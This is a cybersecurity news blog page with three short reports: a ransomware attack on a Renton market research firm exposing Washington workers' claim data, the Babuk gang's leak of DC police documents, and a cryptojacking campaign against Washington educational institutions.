Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label US Washington. Show all posts

16,000 Washington Workers Data Exposed Following a Ransomware Attack

 

In a ransomware attack on a Renton market research company's data system, confidential information of over 16,000 employees might have been compromised. 

The Washington State Labor & Industries Department said the current cyber attempt could have revealed information of thousands of workers in Washington.

According to Pacific Market Research, L&I, one of its contractors, was affected by a ransomware attack on 22 May, that encrypted information saved on some of its servers. These statistics comprised information about contacts, claims, and birth dates of some 16,466 workers who submitted compensation claims for workers in 2019. 

L&I reports that the data were provided to Pacific Market Research to help perform a customer support survey. There were no medical, social security, banking, or credit card numbers included in the information. 

On 4th June, PMR alerted L&I and, according to L&I Spokesman Rich Roesler, the department received further information on 9th June. However, it is said that only on Thursday – almost a month after the very first notification – have the affected people and their employers begun to be informed of the violation. 

“It took the company some time to assess the scope of the incident and determine which documents were potentially at risk,” Roesler said. “Once notified, we worked as quickly as possible to arrange for the notifications and set up a call center to respond to detailed questions.” 

L&I asserts that their computer systems were not compromised in the attack. According to Managing Director Andrew Rosenkranz, PMR has hired an independent cybersecurity firm to examine the situation. 

The cybersecurity company has carried out its independent survey and found no indication of accessing or removing files from the network on the Pacific Market Research network. The PMR states that all confidential customer products are typically encrypted but the L&I file has not been encrypted as noted by the investigation of the cybersecurity company. 

“Once this unencrypted file was identified, L&I was immediately notified of the incident,” Rosenkranz wrote. “After accessing the list to conduct the survey, we did not re-encrypt it. That was wholly our error and one for which we accept full responsibility.” 

L&I and PMR notify the personnel concerned, through the mail, with the release providing free 12-month credit surveillance. PMR says it pays for notification fees and credit surveillance. 

Roesler stated L&I was not involved in PMR's ransomware response. He noted that the department is aimed at informing the employees involved. 

“We also plan to put our customer experience surveys on hold so we can fully review how our data is protected and whether we can resume these sorts of surveys while keeping customer data safe,” Roesler said. 

According to Rosenkranz, PMR managed to recover its whole server via backup systems, and the event was reported to law enforcement agencies. 

“We know that malicious cyber-attacks like what we experienced are affecting businesses around the world and governments at all levels,” Rosenkranz wrote. “As a result of the incident, we’ve taken immediate action to harden our network, including implementing additional security measures.”

Washington DC Police Hit by the Worst Ransomware Ever

 

In the U.S. capital, the police department experienced a major information leak after declining to satisfy the extortion demands of a Russian-speaking ransomware syndicate. As per the experts, the US police department has been hit by the worst ransomware ever. 

On Thursday 13th May, the Gang, identified as the Babuk Squad, published on the dark web, some thousands of confidential documents from the Washington Metropolitan Police Department. Hundreds of police officer intelligence documents, containing feeds from other agencies, such as the FBI and Secret Service, were discovered through a report by The Associated Press. 

Ransomware attacks have reached epidemic proportions as international gangs paralyze local and state governments, police, hospital, and private companies' computer networks. They need substantial payments for deciphering or to prevent the online leakage of stolen information. 

The Colonial Pipeline was shut down last week by a cyber-attack which caused gasoline stockpiling and panic buying across southeast sections of the nation's largest fuel pipeline. 

This Police data leak is "perhaps the most significant ransomware incident to date," due to the risks it poses for officers and civilians, said Brett Callow, a threat analyst and ransomware specialist at the Emsisoft security company. 

Most documents contained security details from many other law enforcement authorities regarding the inauguration of President Joe Biden, along with a connection to a militia group "embedded source." 

The two pipe bombs abandoned at the location of the Democratic Committee and the Republican National Committee before the revolt in the American Capitol on January 6 were studied by the FBI in one document. Yet another document explains the details. This involves "big data pull" from cell towers, as well as plans to "analyze purchases" of Nike shoes that a concerning individual uses. 

In response to an AP request for comments, the police department didn't initially respond but has reported earlier that personal data was compromised. 

Some of the information was subsequently leaked, exposing personal data from background checks of some officials, including information on previous use of drugs, financial conditions, and — in at least one instance — regarding past sexual assault. 

“This is going to send a shock through the law enforcement community throughout the country,” Ted Williams, a former officer at the department who is now a lawyer, told The Associated Press. 

Williams further added that it makes it harder for officers to do their work because of background checks and administrative files publicly disclosed.

“The more the crooks know about a law enforcement officer, the more the crooks try to use that for their advantage,” he said. 

Recently the Babuk community demanded $4 million to not publish the archives, but only around $100,000 was provided. The Ministry did not say whether it offered it. Any discussions will show the difficulty of the issue of ransomware, with the police forced to consider paying for criminal gangs.

Cryptojacking Spree: Targeting Washington State Educational Institutions

 

According to a new advisory released by Palo Alto Network's Unit 42 team, recently, cryptojacking incidents have taken place against educational institutions in Washington State. Threat actors are targeting educational institutions in the United States intending to compromise their networks and mine cryptocurrency covertly. 

Otherwise known as cryptojacking attacks, this is a form of cyberattack in which attackers use deception tactics to install cryptocurrency mining components that leech off of computational power without being noticed or detected. 

On February 16, cybersecurity researchers discovered the first attack, which consisted of a malicious HTTP request sent to a domain owned by an educational institution. Security teams initially mistook it for a trivial command injection flaw, but it turned out to be a command for a web shell backdoor that attackers used to gain access to the institution's network. 

In this form of attack, attackers use various types of miner software to try to generate cryptocurrencies such as Monero, Litecoin, Bitcoin, and Ethereum. Attackers typically compromise a large number of systems to make the attacks lucrative and bring in more cryptocurrency. 

The researchers say that a UPX-packed cpuminer -- used to mine LTC and BTC -- has been delivered by way of malicious traffic. 

If deployment is successful, the backdoor is then able to call and execute the crypto mining payload. Besides, the malware will download a mini shell that pretends to be a wp-load.php file. "Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet," the report states. 

Cryptocurrency mined on infected systems is sent to two wallets owned by the operators (1,2). In two other incidents, there were some differences when it came to user agent strings, pass values, and algorithms, but the general attack method remained the same. 

"The malicious request [...] exhibits several similarities," Unit 42 noted. "It's the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it's likely the same perpetrator behind the cryptojacking operation."

An analysis of K-12 schools across the United States revealed in March that 2020 is a "record-breaking" year for cybersecurity incidents. Over 400 incidents were reported in the study, including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.